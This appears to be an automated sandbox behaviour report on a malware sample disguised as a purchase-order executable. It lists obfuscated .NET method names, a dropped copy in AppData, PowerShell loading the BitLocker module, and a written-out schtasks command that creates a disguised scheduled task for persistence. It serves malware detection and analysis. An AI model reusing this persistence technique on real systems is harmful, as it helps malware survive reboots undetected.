Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	High entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, Dqkyhukd5DPEpWtsrk.cs	High entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, hWtek0zyFhm6YOkDOc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, TVHBd5rBSDSNtLCLLd.cs	High entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, YfsUVIwKwligCWwUFOb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, G3Zlh9sDOA6l6Xdsx8.cs	High entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, XiDiD0bdPoQPVP9xtF.cs	High entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, unupZHtXVeGThL8D36.cs	High entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, O5tYpwmEKrOLf39LE6.cs	High entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, H9cpRKwuIODiPO2dgX1.cs	High entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, SuXDWccPOvK5odiT5e.cs	High entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, bJvLSL34IERm7aJscU.cs	High entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, t2qt23C1ZO7pYQfAKA.cs	High entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, AqBlQbya8Vp6IS1UoE.cs	High entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, J7ecEYjmNahUm7LApD.cs	High entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, dlx18wvlGuFkC3sMg9.cs	High entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, JdId2Rh2LV5U7y7cd7.cs	High entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, xZ2HP9w52KJ9j9OhmHp.cs	High entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, xLOmlk5E6U3TdCC4SP.cs	High entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	High entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, Dqkyhukd5DPEpWtsrk.cs	High entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, hWtek0zyFhm6YOkDOc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, TVHBd5rBSDSNtLCLLd.cs	High entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, YfsUVIwKwligCWwUFOb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, G3Zlh9sDOA6l6Xdsx8.cs	High entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, XiDiD0bdPoQPVP9xtF.cs	High entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, unupZHtXVeGThL8D36.cs	High entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, O5tYpwmEKrOLf39LE6.cs	High entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, H9cpRKwuIODiPO2dgX1.cs	High entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, SuXDWccPOvK5odiT5e.cs	High entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, bJvLSL34IERm7aJscU.cs	High entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, t2qt23C1ZO7pYQfAKA.cs	High entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, AqBlQbya8Vp6IS1UoE.cs	High entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, J7ecEYjmNahUm7LApD.cs	High entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, dlx18wvlGuFkC3sMg9.cs	High entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, JdId2Rh2LV5U7y7cd7.cs	High entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, xZ2HP9w52KJ9j9OhmHp.cs	High entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, xLOmlk5E6U3TdCC4SP.cs	High entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'

Source: C:\Users\user\Desktop\rPO0977-6745.exe

File created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\rPO0977-6745.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
